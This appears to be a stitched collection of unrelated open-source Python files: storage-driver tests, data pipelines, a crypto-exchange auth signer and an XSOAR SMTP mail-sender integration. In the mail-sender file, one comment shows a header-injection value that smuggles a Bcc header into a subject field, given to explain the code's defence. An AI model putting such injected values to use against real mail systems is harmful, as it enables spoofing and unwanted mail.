'total_capacity_gb': 0,
'vendor_name': 'HPE',
'pools': None,
'replication_domain': None,
'filter_function': None,
'goodness_function': None,
'ipv4_support': True,
'ipv6_support': False,
'max_share_server_size': -1,
'max_shares_per_share_server': -1,
'security_service_update_support': False,
'share_server_multiple_subnet_support': False,
'network_allocation_update_support': False,
}
result = self.driver.get_share_stats(refresh=True)
self.assertEqual(expected_result, result)
expected_calls = [
mock.call.info('Skipping capacity and capabilities update. '
'Setup has not completed.')
]
hpe3pardriver.LOG.assert_has_calls(expected_calls)
def test_driver_get_share_stats_no_refresh(self):
"""Driver does not call mediator when refresh=False."""
self.init_driver()
self.driver._stats = constants.EXPECTED_STATS
result = self.driver.get_share_stats(refresh=False)
self.assertEqual(constants.EXPECTED_STATS, result)
self.assertEqual([], self.mock_mediator.mock_calls)
def test_driver_get_share_stats_with_refresh(self):
"""Driver adds stats from mediator to expected structure."""
self.init_driver()
expected_free = constants.EXPECTED_SIZE_1
expected_capacity = constants.EXPECTED_SIZE_2
expected_version = self.driver.VERSION
self.mock_mediator.get_fpg_status.return_value = {
'pool_name': constants.EXPECTED_FPG,
'total_capacity_gb': expected_capacity,
'free_capacity_gb': expected_free,
'thin_provisioning': True,
'dedupe': False,
'hpe3par_flash_cache': False,
'hp3par_flash_cache': False,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'provisioned_capacity_gb': expected_capacity
}
expected_result = {
'share_backend_name': 'HPE_3PAR',
'vendor_name': 'HPE',
'driver_version': expected_version,
'storage_protocol': 'NFS_CIFS',
'driver_handles_share_servers': True,
'total_capacity_gb': 0,
'free_capacity_gb': 0,
'provisioned_capacity_gb': 0,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'max_over_subscription_ratio': None,
'max_share_server_size': -1,
'max_shares_per_share_server': -1,
'qos': False,
'thin_provisioning': True,
'pools': [{
'pool_name': constants.EXPECTED_FPG,
'total_capacity_gb': expected_capacity,
'free_capacity_gb': expected_free,
'thin_provisioning': True,
'dedupe': False,
'hpe3par_flash_cache': False,
'hp3par_flash_cache': False,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'provisioned_capacity_gb': expected_capacity}],
'snapshot_support': True,
'create_share_from_snapshot_support': True,
'revert_to_snapshot_support': False,
'security_service_update_support': False,
'share_server_multiple_subnet_support': False,
'network_allocation_update_support': False,
'mount_snapshot_support': False,
'share_group_stats': {
'consistent_snapshot_support': None,
},
'replication_domain': None,
'filter_function': None,
'goodness_function': None,
'ipv4_support': True,
'ipv6_support': False,
}
result = self.driver.get_share_stats(refresh=True)
self.assertEqual(expected_result, result)
expected_calls = [
mock.call.get_fpg_status(constants.EXPECTED_FPG)
]
self.mock_mediator.assert_has_calls(expected_calls)
self.assertTrue(self.mock_mediator.get_fpg_status.called)
def test_driver_get_share_stats_premature(self):
"""Driver init stats before init_driver completed."""
expected_version = self.driver.VERSION
self.mock_mediator.get_fpg_status.return_value = {'not_called': 1}
expected_result = {
'qos': False,
'driver_handles_share_servers': True,
'driver_version': expected_version,
'free_capacity_gb': 0,
'max_over_subscription_ratio': None,
'max_share_server_size': -1,
'max_shares_per_share_server': -1,
'pools': None,
'provisioned_capacity_gb': 0,
'reserved_percentage': 0,
'reserved_snapshot_percentage': 0,
'reserved_share_extend_percentage': 0,
'share_backend_name': 'HPE_3PAR',
'storage_protocol': 'NFS_CIFS',
'thin_provisioning': True,
'total_capacity_gb': 0,
'vendor_name': 'HPE',
'snapshot_support': True,
'create_share_from_snapshot_support': True,
'revert_to_snapshot_support': False,
'security_service_update_support': False,
'share_server_multiple_subnet_support': False,
'network_allocation_update_support': False,
'mount_snapshot_support': False,
'share_group_stats': {
'consistent_snapshot_support': None,
},
'replication_domain': None,
'filter_function': None,
'goodness_function': None,
'ipv4_support': True,
'ipv6_support': False,
}
result = self.driver.get_share_stats(refresh=True)
self.assertEqual(expected_result, result)
self.assertFalse(self.mock_mediator.get_fpg_status.called)
@ddt.data(('test"dquote', 'test_dquote'),
("test'squote", "test_squote"),
('test-:;,.punc', 'test-:_punc'),
('test with spaces ', 'test with spaces '),
('x' * 300, 'x' * 300))
@ddt.unpack
def test_build_comment(self, display_name, clean_name):
host = 'test-stack1@backend#pool'
share = {
'host': host,
'display_name': display_name
}
comment = self.driver.build_share_comment(share)
cleaned = {
'host': host,
'clean_name': clean_name
}
expected = ("OpenStack Manila - host=%(host)s "
"orig_name=%(clean_name)s created=" % cleaned)[:254]
self.assertLess(len(comment), 255)
self.assertTrue(comment.startswith(expected))
# Test for some chars that are not allowed.
# Don't test with same regex as the code uses.
for c in "'\".,;":
self.assertNotIn(c, comment)
def test_get_network_allocations_number(self):
self.assertEqual(1, self.driver.get_network_allocations_number())
def test_setup_server(self):
"""Setup server by creating a new FSIP."""
self.init_driver()
network_info = [{
'network_allocations': [
{'ip_address': constants.EXPECTED_IP_1234}],
'cidr': '/'.join((constants.EXPECTED_IP_1234,
constants.CIDR_PREFIX)),
'network_type': constants.EXPECTED_VLAN_TYPE,
'segmentation_id': constants.EXPECTED_VLAN_TAG,
'server_id': constants.EXPECTED_SERVER_ID,
}]
expected_result = {
'share_server_name': constants.EXPECTED_SERVER_ID,
'share_server_id': constants.EXPECTED_SERVER_ID,
'ip': constants.EXPECTED_IP_1234,
'subnet': constants.EXPECTED_SUBNET,
'vlantag': constants.EXPECTED_VLAN_TAG,
'fpg': constants.EXPECTED_FPG,
'vfs': constants.EXPECTED_VFS,
}
metadata = {'request_host': constants.EXPECTED_HOST}
result = self.driver._setup_server(network_info, metadata)
expected_calls = [
mock.call.create_fsip(constants.EXPECTED_IP_1234,
constants.EXPECTED_SUBNET,
constants.EXPECTED_VLAN_TAG,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)
self.assertEqual(expected_result, result)
def test_setup_server_fails_for_unsupported_network_type(self):
"""Setup server fails for unsupported network type"""
self.init_driver()
network_info = [{
'network_allocations': [
{'ip_address': constants.EXPECTED_IP_1234}],
'cidr': '/'.join((constants.EXPECTED_IP_1234,
constants.CIDR_PREFIX)),
'network_type': constants.EXPECTED_VXLAN_TYPE,
'segmentation_id': constants.EXPECTED_VLAN_TAG,
'server_id': constants.EXPECTED_SERVER_ID,
}]
metadata = {'request_host': constants.EXPECTED_HOST}
self.assertRaises(exception.NetworkBadConfigurationException,
self.driver._setup_server,
network_info, metadata)
def test_setup_server_fails_for_exceed_pool_max_supported_ips(self):
"""Setup server fails when the VFS has reached max supported IPs"""
self.init_driver()
network_info = [{
'network_allocations': [
{'ip_address': constants.EXPECTED_IP_1234}],
'cidr': '/'.join((constants.EXPECTED_IP_1234,
constants.CIDR_PREFIX)),
'network_type': constants.EXPECTED_VLAN_TYPE,
'segmentation_id': constants.EXPECTED_VLAN_TAG,
'server_id': constants.EXPECTED_SERVER_ID,
}]
metadata = {'request_host': constants.EXPECTED_HOST}
expected_vfs = self.driver.fpgs[
constants.EXPECTED_FPG][constants.EXPECTED_VFS]
self.driver.fpgs[constants.EXPECTED_FPG][constants.EXPECTED_VFS] = [
'10.0.0.1', '10.0.0.2', '10.0.0.3', '10.0.0.4']
self.assertRaises(exception.Invalid,
self.driver._setup_server,
network_info, metadata)
self.driver.fpgs[constants.EXPECTED_FPG][constants.EXPECTED_VFS
] = expected_vfs
def test_teardown_server(self):
"""Test tear down server"""
self.init_driver()
server_details = {
'ip': constants.EXPECTED_IP_10203040,
'fpg': constants.EXPECTED_FPG,
'vfs': constants.EXPECTED_VFS,
}
self.driver._teardown_server(server_details)
expected_calls = [
mock.call.remove_fsip(constants.EXPECTED_IP_10203040,
constants.EXPECTED_FPG,
constants.EXPECTED_VFS)
]
self.mock_mediator.assert_has_calls(expected_calls)

# ==== pydata/xarray :: /xarray/tests/test_tutorial.py ====

from __future__ import annotations
import pytest
from xarray import DataArray, tutorial
from xarray.tests import assert_identical, network
@network
class TestLoadDataset:
@pytest.fixture(autouse=True)
def setUp(self):
self.testfile = "tiny"
def test_download_from_github(self, tmp_path) -> None:
cache_dir = tmp_path / tutorial._default_cache_dir_name
ds = tutorial.open_dataset(self.testfile, cache_dir=cache_dir).load()
tiny = DataArray(range(5), name="tiny").to_dataset()
assert_identical(ds, tiny)
def test_download_from_github_load_without_cache(
self, tmp_path, monkeypatch
) -> None:
cache_dir = tmp_path / tutorial._default_cache_dir_name
ds_nocache = tutorial.open_dataset(
self.testfile, cache=False, cache_dir=cache_dir
).load()
ds_cache = tutorial.open_dataset(self.testfile, cache_dir=cache_dir).load()
assert_identical(ds_cache, ds_nocache)

# ==== 18F/tock :: /tock/employees/migrations/0029_remove_userdata_is_18f_employee.py ====

# Generated by Django 2.2.12 on 2020-05-05 01:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('employees', '0028_remove_userdata_is_billable'),
]
operations = [
migrations.RemoveField(
model_name='userdata',
name='is_18f_employee',
),
]
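
# As a hedged usage note: this migration is applied with Django's standard
# command, e.g. `python manage.py migrate employees 0029` (project-specific
# settings and environment assumed).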

# ==== raphaelvallat/yasa :: /yasa/tests/test_io.py ====

"""Test I/O."""
import pytest
import logging
import unittest
from yasa.io import (
is_sleepecg_installed,
set_log_level,
is_tensorpac_installed,
is_pyriemann_installed,
)
logger = logging.getLogger("yasa")
levels = ["debug", "info", "warning", "error", "critical"]
class TestIO(unittest.TestCase):
"""Test IO functions."""
def test_log_level(self):
"""Test setting the log level."""
for lev in levels:
set_log_level(lev)
set_log_level(False)
set_log_level(True)
set_log_level(None)
with pytest.raises(ValueError):
set_log_level("WRONG")
def test_logger(self):
"""Test logger levels."""
logger.debug("debug")
logger.info("info")
logger.warning("warning")
logger.critical("critical")
def test_dependence(self):
"""Test dependancies."""
is_tensorpac_installed()
is_pyriemann_installed()
is_sleepecg_installed()

# ==== amperser/proselint :: /worker.py ====

"""Heroku web worker."""
from builtins import map
import os
import redis
from rq import Worker, Queue, Connection
listen = ['high', 'default', 'low']
redis_url = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')
conn = redis.from_url(redis_url)
if __name__ == '__main__':
with Connection(conn):
worker = Worker(list(map(Queue, listen)))
worker.work()
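
# A minimal sketch of how a job would be handed to this worker from another
# process; the dotted-path string lets the worker import the function, and the
# sample text is a placeholder:
#
#     from rq import Queue
#     q = Queue('default', connection=conn)
#     job = q.enqueue('proselint.tools.lint', 'The very unique dog jumped.')
#     print(job.id)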

# ==== mlmed/torchxrayvision :: /torchxrayvision/baseline_models/xinario/__init__.py ====

import os
from typing import List
import torch
import torch.nn as nn
import torchvision
import pathlib
import torchxrayvision as xrv
class ViewModel(nn.Module):
"""
The native resolution of the model is 320x320. Images are scaled
automatically.
`Demo notebook <https://github.com/mlmed/torchxrayvision/blob/master/scripts/view_classifier.ipynb>`__
.. code-block:: python
model = xrv.baseline_models.xinario.ViewModel()
image = xrv.utils.load_image('00027426_000.png')
image = torch.from_numpy(image)[None,...]
pred = model(image)
        # tensor([[17.3186, 26.7156]], grad_fn=<AddmmBackward0>)
model.targets[pred.argmax()]
# Lateral
Source: https://github.com/xinario/chestViewSplit
"""
targets: List[str] = ['Frontal', 'Lateral']
""""""
def __init__(self):
super(ViewModel, self).__init__()
url = "https://github.com/mlmed/torchxrayvision/releases/download/v1/xinario_chestViewSplit_resnet-50.pt"
weights_filename = os.path.basename(url)
weights_storage_folder = os.path.expanduser(os.path.join("~", ".torchxrayvision", "models_data"))
self.weights_filename_local = os.path.expanduser(os.path.join(weights_storage_folder, weights_filename))
if not os.path.isfile(self.weights_filename_local):
print("Downloading weights...")
print("If this fails you can run `wget {} -O {}`".format(url, self.weights_filename_local))
pathlib.Path(weights_storage_folder).mkdir(parents=True, exist_ok=True)
xrv.utils.download(url, self.weights_filename_local)
self.model = torchvision.models.resnet.resnet50()
try:
weights = torch.load(self.weights_filename_local)
            self.model.load_state_dict(weights)
self.model = self.model.eval()
except Exception as e:
print("Loading failure. Check weights file:", self.weights_filename_local)
raise e
self.upsample = nn.Upsample(
size=(224, 224),
mode='bilinear',
align_corners=False,
)
self.norm = torchvision.transforms.Normalize(
[0.485, 0.456, 0.406],
[0.229, 0.224, 0.225],
)
def forward(self, x):
x = x.repeat(1, 3, 1, 1)
x = self.upsample(x)
# expecting values between [-1024,1024]
x = (x + 1024) / 2048
# now between [0,1]
x = self.norm(x)
return self.model(x)[:,:2] # cut off the rest of the outputs
def __repr__(self):
return "xinario-view-prediction"

# ==== CoinAlpha/hummingbot :: /hummingbot/connector/exchange/bittrex/bittrex_auth.py ====

import time
import hmac
import hashlib
import urllib
from typing import Dict, Any, Tuple
import ujson
class BittrexAuth:
def __init__(self, api_key: str, secret_key: str):
self.api_key = api_key
self.secret_key = secret_key
def generate_auth_dict(
self,
http_method: str,
url: str,
params: Dict[str, Any] = None,
body: Dict[str, Any] = None,
subaccount_id: str = "",
    ) -> Dict[str, Any]:
"""
Generates the url and the valid signature to authenticate with the API endpoint.
:param http_method: String representing the HTTP method in use ['GET', 'POST', 'DELETE'].
:param url: String representing the API endpoint.
:param params: Dictionary of url parameters to be included in the api request. USED ONLY IN SOME CASES
:param body: Dictionary representing the values in a request body.
:param subaccount_id: String value of subaccount id.
:return: Dictionary containing the final 'params' and its corresponding 'signature'.
"""
        # Append params to the url
        def append_params_to_url(url: str, params: Dict[str, Any] = {}) -> str:
if params:
param_str = urllib.parse.urlencode(params)
return f"{url}?{param_str}"
return url
        def construct_content_hash(body: Dict[str, Any] = {}) -> Tuple[str, bytes]:
            json_byte: bytes = "".encode()
            if body:
                json_byte = ujson.dumps(body).encode()
            return hashlib.sha512(json_byte).hexdigest(), json_byte
timestamp = str(int(time.time() * 1000))
url = append_params_to_url(url, params)
content_hash, content_bytes = construct_content_hash(body)
content_to_sign = "".join([timestamp, url, http_method, content_hash, subaccount_id])
signature = hmac.new(self.secret_key.encode(), content_to_sign.encode(), hashlib.sha512).hexdigest()
# V3 Authentication headers
headers = {
"Api-Key": self.api_key,
"Api-Timestamp": timestamp,
"Api-Content-Hash": content_hash,
"Api-Signature": signature,
"Content-Type": "application/json",
"Accept": "application/json",
}
if subaccount_id:
headers.update({"Api-Subaccount-Id": subaccount_id})
return {"headers": headers, "body": content_bytes, "url": url}

# ==== demisto/content :: /Packs/MailSenderNew/Integrations/MailSenderNew/MailSenderNew.py ====

import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import contextlib
from typing import NoReturn
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.message import Message
from email.header import Header
from smtplib import SMTP, SMTP_SSL
from smtplib import SMTPRecipientsRefused
import base64
import json
import mimetypes
from email import encoders
import re
import random
import string
import smtplib
import traceback
import sys
from itertools import zip_longest
SERVER: Optional[smtplib.SMTP] = None
UTF_8 = 'utf-8'
def randomword(length):
"""
Generate a random string of given length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length))
def return_error_mail_sender(data) -> NoReturn: # type: ignore
"""
Return error as result and exit
"""
if SERVER:
        # quit() may throw if the connection was closed already
with contextlib.suppress(Exception):
SERVER.quit()
return_error(data)
def guess_type(filename):
"""
Return the maintype and subtype guessed based on the extension
"""
content_type, encoding = mimetypes.guess_type(filename)
if content_type is None or encoding is not None:
# No guess could be made, or the file is encoded (compressed), so
# use a generic bag-of-bits type.
content_type = 'application/octet-stream'
return content_type.split('/', 1)
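
# For example, guess_type('notes.txt') returns ['text', 'plain'], while an
# unknown extension such as 'blob.xyz' falls back to ['application', 'octet-stream'].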
def handle_file(msg, filename, maintype, subtype, cid, data):
"""
Add the attachment to the message and add the relevant header
"""
if maintype == 'text':
# UTF-8 is a pretty safe bet
att = MIMEText(data, subtype, UTF_8) # type: MIMEBase
elif maintype == 'image':
att = MIMEImage(data, subtype)
elif maintype == 'audio':
att = MIMEAudio(data, subtype)
elif maintype == 'message':
att = MIMEBase(maintype, subtype)
att.set_payload(data)
else:
att = MIMEBase(maintype, subtype)
att.set_payload(data)
# Encode the payload using Base64
encoders.encode_base64(att)
# Set the filename parameter
if cid:
att.add_header('Content-Disposition', 'inline', filename=filename)
att.add_header('Content-ID', '<' + cid + '>')
else:
att.add_header('Content-Disposition', 'attachment', filename=filename)
msg.attach(att)
def handle_html(html_body):
"""
Extract all data-url content from within the html and return as separate attachments.
    Due to security implications, we support only images here.
    Beautiful Soup may not be available, so we just do a regex search.
"""
attachments = []
clean_body = ''
last_index = 0
for i, m in enumerate(
re.finditer(r'<img.+?src=\"(data:(image/.+?);base64,([a-zA-Z0-9+/=\r\n]+?))\"', html_body, re.I)):
maintype, subtype = m.group(2).split('/', 1)
name = 'image%d.%s' % (i, subtype)
att = {
'maintype': maintype,
'subtype': subtype,
'data': base64.b64decode(m.group(3)),
'name': name,
'cid': '%r@%r.%r' % (name, randomword(8), randomword(8))
}
attachments.append(att)
clean_body += html_body[last_index:m.start(1)] + 'cid:' + att['cid']
last_index = m.end() - 1
clean_body += html_body[last_index:]
return clean_body, attachments
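
# Illustrative sketch of the transformation (the base64 payload is a dummy
# value, not a real image):
#
#     body = '<p><img src="data:image/png;base64,iVBORw0="></p>'
#     clean, atts = handle_html(body)
#     # clean references the extracted image by its generated Content-ID
#     # ('cid:...'), and atts holds one dict with maintype 'image',
#     # subtype 'png', a random cid, and the decoded payload bytes.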
def collect_manual_attachments():
attachments = []
manual_attach_obj: List[Dict[Any, Any]] = demisto.getArg('manualAttachObj') or []
for attachment in manual_attach_obj:
res = demisto.getFilePath(os.path.basename(attachment['RealFileName']))
path = res['path']
maintype, subtype = guess_type(attachment['FileName'])
data: str | bytes # Because of mypy errors.
if maintype == 'text':
with open(path) as fp:
data = fp.read()
else:
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': attachment['FileName'],
'maintype': maintype,
'subtype': subtype,
'data': data,
'cid': ''
})
return attachments
def collect_attachments():
"""
Collect all attachments into a list with all data
"""
attachments = []
attach_ids = argToList(demisto.getArg('attachIDs'))
attach_names = argToList(demisto.getArg('attachNames'))
attach_cids = argToList(demisto.getArg('attachCIDs'))
for i, aid in enumerate(attach_ids):
try:
file_res = demisto.getFilePath(aid)
path = file_res['path']
if len(attach_names) > i and attach_names[i]:
filename = attach_names[i]
else:
filename = file_res['name']
if len(attach_cids) > i and attach_cids[i]:
cid = attach_cids[i]
else:
cid = ''
maintype, subtype = guess_type(filename)
data: str | bytes # Because of mypy errors.
if maintype == 'text':
with open(path) as fp:
data = fp.read()
else:
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': filename,
'maintype': maintype,
'subtype': subtype,
'data': data,
'cid': cid
})
except Exception as exc:
demisto.error("Invalid entry {} with exception: {}".format(aid, exc))
return_error_mail_sender('Entry %s is not valid or is not a file entry' % aid)
# handle transient files
args = demisto.args()
f_names = args.get('transientFile', [])
f_names = f_names if isinstance(f_names, (list, tuple)) else f_names.split(',')
f_contents = args.get('transientFileContent', [])
f_contents = f_contents if isinstance(f_contents, (list, tuple)) else f_contents.split(',')
f_cids = args.get('transientFileCID', [])
f_cids = f_cids if isinstance(f_cids, (list, tuple)) else f_cids.split(',')
for name, data, cid in zip_longest(f_names, f_contents, f_cids):
if name is None or data is None:
break
maintype, subtype = guess_type(name)
attachments.append({
'name': name,
'maintype': maintype,
'subtype': subtype,
'data': data,
'cid': cid
})
return attachments
def parse_params(params):
actual_params = {}
# Build a simple key/value
for p in params:
if params[p].get('value'):
actual_params[p] = params[p]['value']
elif params[p].get('key'):
actual_params[p] = demisto.dt(demisto.context(), params[p]['key'])
return actual_params
def parse_template_params():
"""
Translate the template params if they exist from the context
"""
params_str = demisto.getArg('templateParams')
if params_str:
if isinstance(params_str, dict):
return parse_params(params_str)
else:
try:
return parse_params(json.loads(params_str))
except (ValueError, TypeError) as e:
return_error_mail_sender('Unable to parse templateParams: %s' % (str(e)))
def header(s):
if not s:
return None
s_no_newlines = ' '.join(s.splitlines())
return Header(s_no_newlines)
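
# Folding newlines here also guards against header injection: for example,
# header('Hi\r\nBcc: evil@example.com') yields the single-line value
# 'Hi Bcc: evil@example.com' rather than smuggling in an extra SMTP header.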
def create_msg():
"""
    Gets args from the demisto object.
    Returns: body, html_body, a string representation of the message, to, cc, bcc
"""
# Collect all parameters
to = argToList(demisto.getArg('to'))
cc = argToList(demisto.getArg('cc'))
bcc = argToList(demisto.getArg('bcc'))
additional_header = argToList(demisto.getArg('additionalHeader'))
subject = demisto.getArg('subject') or ''
body = demisto.getArg('body') or ''
html_body = demisto.getArg('htmlBody') or ''
reply_to = demisto.getArg('replyTo')
template_params = parse_template_params()
if template_params:
body = body.format(**template_params)
html_body = html_body.format(**template_params)
# Basic validation - we allow pretty much everything, but you have to have at least a recipient
# We allow messages without subject and also without body
if not to and not cc and not bcc:
return_error_mail_sender('You must have at least one recipient')
attachments = collect_attachments()
attachments.extend(collect_manual_attachments())
# Let's see what type of message we are talking about
if not html_body:
# This is a simple text message - we cannot have CIDs here
if len(attachments) > 0:
# This is multipart - default is mixed
msg = MIMEMultipart() # type: Message
msg.preamble = 'The message is only available on a MIME-aware mail reader.\n'
msg.attach(MIMEText(body, 'plain', UTF_8))
for att in attachments:
handle_file(msg, att['name'], att['maintype'], att['subtype'], None, att['data'])
else:
# Just text, how boring
msg = MIMEText(body, 'plain', UTF_8)
else:
html_body, html_attachments = handle_html(html_body)
attachments += html_attachments
if len(attachments) > 0:
msg = MIMEMultipart()
msg.preamble = 'The message is only available on a MIME-aware mail reader.\n'
if body:
alt = MIMEMultipart('alternative')
alt.attach(MIMEText(body, 'plain', UTF_8))
alt.attach(MIMEText(html_body, 'html', UTF_8))
msg.attach(alt)
else:
msg.attach(MIMEText(html_body, 'html', UTF_8))
for att in attachments:
handle_file(msg, att['name'], att['maintype'], att['subtype'], att['cid'], att['data'])
else:
if body:
msg = MIMEMultipart('alternative')
msg.preamble = 'The message is only available on a MIME-aware mail reader.\n'
msg.attach(MIMEText(body, 'plain', UTF_8))
msg.attach(MIMEText(html_body, 'html', UTF_8))
else:
msg = MIMEText(html_body, 'html', UTF_8)
# Add the relevant headers to the most outer message
msg['Subject'] = header(subject)
msg['From'] = header(demisto.getParam('from'))
if reply_to:
msg['Reply-To'] = header(reply_to)
if to:
msg['To'] = header(','.join(to))
if cc:
msg['CC'] = header(','.join(cc))
if additional_header:
for h in additional_header:
header_name_and_value = h.split('=', 1)
msg[header_name_and_value[0]] = header(header_name_and_value[1])
# Notice we should not add BCC header since Python2 does not filter it
return body, html_body, msg.as_string(), to, cc, bcc
def get_user_pass():
credentials: Dict[str, Any] = demisto.getParam('credentials') # noqa
if credentials:
return (str(credentials.get('identifier', '')),
str(credentials.get('password', '')))
return None, None
def swap_stderr(new_stderr):
"""
    Swap the value of stderr if given; return the old value.
    Newer Python versions use `sys.stderr` directly in smtplib, so patch that instead.
"""
if hasattr(smtplib, 'stderr'):
module = smtplib
else:
module = sys # type: ignore
old_stderr = getattr(module, 'stderr')
if new_stderr:
setattr(module, 'stderr', new_stderr)
return old_stderr
def main():
# Following methods raise exceptions so no need to check for return codes
# But we do need to catch them
global SERVER
from_email = demisto.getParam('from')
fqdn = demisto.params().get('fqdn')
fqdn = (fqdn and fqdn.strip()) or None
tls = demisto.getParam('tls')
stderr_org = None
try:
if demisto.command() == 'test-module':
stderr_org = swap_stderr(LOG)
smtplib.SMTP.debuglevel = 1
# TODO - support for non-valid certs
if tls == 'SSL/TLS':
SERVER = SMTP_SSL(demisto.getParam('host'), int(demisto.params().get('port', 0)), local_hostname=fqdn)
else:
SERVER = SMTP(demisto.getParam('host'), # type: ignore[assignment]
int(demisto.params().get('port', 0)), local_hostname=fqdn)
SERVER.ehlo() # type: ignore
# For BC purposes where TLS was a checkbox (no value only true or false) if TLS=True or TLS='STARTTLS' we enter
# this condition, otherwise it means TLS is not configured (TLS=False) or is set to 'SSL/TLS' or 'None'.
if tls is True or tls == 'STARTTLS' or str(tls).lower() == 'true':
SERVER.starttls() # type: ignore
user, password = get_user_pass()
if user:
SERVER.login(user, password) # type: ignore[union-attr]
except Exception as e:
# also reset at the bottom finally
swap_stderr(stderr_org) # type: ignore[union-attr]
smtplib.SMTP.debuglevel = 0
demisto.error('Failed test: {}\nStack trace: {}'.format(e, traceback.format_exc()))
return_error_mail_sender(e)
return # so mypy knows that we don't continue after this
# -- COMMANDS --
try:
if demisto.command() == 'test-module':
msg = MIMEText('This is a test mail from Demisto\nRegards\nDBot') # type: Message
msg['Subject'] = 'Test mail from Demisto'
msg['From'] = from_email
msg['To'] = from_email
SERVER.sendmail(from_email, [from_email], msg.as_string()) # type: ignore[union-attr]
SERVER.quit() # type: ignore[union-attr]
demisto.results('ok')
elif demisto.command() == 'send-mail':
raw_message = demisto.getArg('raw_message')
if raw_message:
to = argToList(demisto.getArg('to'))
cc = argToList(demisto.getArg('cc'))
bcc = argToList(demisto.getArg('bcc'))
str_msg = raw_message
html_body = raw_message
else:
(_, html_body, str_msg, to, cc, bcc) = create_msg()
SERVER.sendmail(from_email, to + cc + bcc, str_msg) # type: ignore[union-attr]
SERVER.quit()
render_body = argToBoolean(demisto.getArg('renderBody') or False)
results = [CommandResults(entry_type=EntryType.NOTE, raw_response='Mail sent successfully')]
if render_body:
results.append(CommandResults(
entry_type=EntryType.NOTE,
content_format=EntryFormat.HTML,
raw_response=html_body,
))
return_results(results)
else:
return_error_mail_sender('Command not recognized')
except SMTPRecipientsRefused as e:
error_msg = ''.join('{}\n'.format(val) for key, val in e.recipients.items())
return_error_mail_sender("Encountered error: {}".format(error_msg))
except Exception as e:
return_error_mail_sender(e)
finally:
swap_stderr(stderr_org) # type: ignore[union-attr]
smtplib.SMTP.debuglevel = 0
# python2 uses __builtin__ python3 uses builtins
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()

# ==== GoogleCloudPlatform/covid-19-open-data :: /src/pipelines/epidemiology/ru_covid19_russia.py ====

# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from typing import Any, Dict
from pandas import DataFrame
from lib.io import read_file
from lib.data_source import DataSource
from lib.utils import pivot_table
_column_adapter = {
"confirmed": "total_confirmed",
"deaths": "total_deceased",
"recovered": "total_recovered",
}
class RussiaCovid19DataSource(DataSource):
def parse(self, sources: Dict[Any, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame:
with open(sources[0], "r") as fh:
data = json.load(fh)
records = []
for subregion1_name, timeseries in data.items():
record = {
"country_code": "RU",
"subregion2_code": None,
"locality_code": None,
"match_string": subregion1_name.lower(),
}
for row in timeseries:
records.append(dict(record, **row))
cast_cols = list(_column_adapter.values())
data = DataFrame.from_records(records).rename(columns=_column_adapter)
data[cast_cols] = data[cast_cols].astype(int)
return data
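
# The source JSON consumed by parse() is expected to look roughly like the
# sketch below (region name -> list of cumulative daily rows); the field set
# is inferred from _column_adapter, and the "date" key is an assumption:
#
#     {
#         "Moscow": [
#             {"date": "2020-03-20", "confirmed": 131, "deaths": 0, "recovered": 5},
#             {"date": "2020-03-21", "confirmed": 137, "deaths": 0, "recovered": 5}
#         ]
#     }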

# ==== chibisov/drf-extensions :: /tests_app/tests/unit/utils/tests.py ====

import contextlib
try:
from unittest import mock
except ImportError:
import mock
from django.test import TestCase
from rest_framework_extensions.utils import prepare_header_name, get_rest_framework_version
@contextlib.contextmanager
def parsed_version(version):
with mock.patch('rest_framework.VERSION', version):
yield get_rest_framework_version()
class TestPrepareHeaderName(TestCase):
def test_upper(self):
self.assertEqual(prepare_header_name('Accept'), 'HTTP_ACCEPT')
def test_replace_dash_with_underscores(self):
self.assertEqual(
prepare_header_name('Accept-Language'), 'HTTP_ACCEPT_LANGUAGE')
def test_strips_whitespaces(self):
self.assertEqual(
prepare_header_name(' Accept-Language '), 'HTTP_ACCEPT_LANGUAGE')
def test_adds_http_prefix(self):
self.assertEqual(
prepare_header_name('Accept-Language'), 'HTTP_ACCEPT_LANGUAGE')
def test_get_rest_framework_version_exotic_version(self):
"""See <https://github.com/chibisov/drf-extensions/pull/198>"""
with parsed_version('1.2alphaSOMETHING') as version:
self.assertEqual(version, (1, 2, 'alpha', 'SOMETHING'))
def test_get_rest_framework_version_normal_version(self):
"""See <https://github.com/chibisov/drf-extensions/pull/198>"""
with parsed_version('3.14.16') as version:
self.assertEqual(version, (3, 14, 16))

# ==== jonasrothfuss/ProMP :: /experiment_utils/run_sweep.py ====

import sys
import os
import argparse
import itertools
from experiment_utils import config
from experiment_utils.utils import query_yes_no
import doodad as dd
import doodad.mount as mount
import doodad.easy_sweep.launcher as launcher
from doodad.easy_sweep.hyper_sweep import run_sweep_doodad
def run_sweep(run_experiment, sweep_params, exp_name, instance_type='c4.xlarge'):
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, default='local',
help='Mode for running the experiments - local: runs on local machine, '
'ec2: runs on AWS ec2 cluster (requires a proper configuration file)')
args = parser.parse_args(sys.argv[1:])
local_mount = mount.MountLocal(local_dir=config.BASE_DIR, pythonpath=True)
docker_mount_point = os.path.join(config.DOCKER_MOUNT_DIR, exp_name)
sweeper = launcher.DoodadSweeper([local_mount], docker_img=config.DOCKER_IMAGE, docker_output_dir=docker_mount_point,
local_output_dir=os.path.join(config.DATA_DIR, 'local', exp_name))
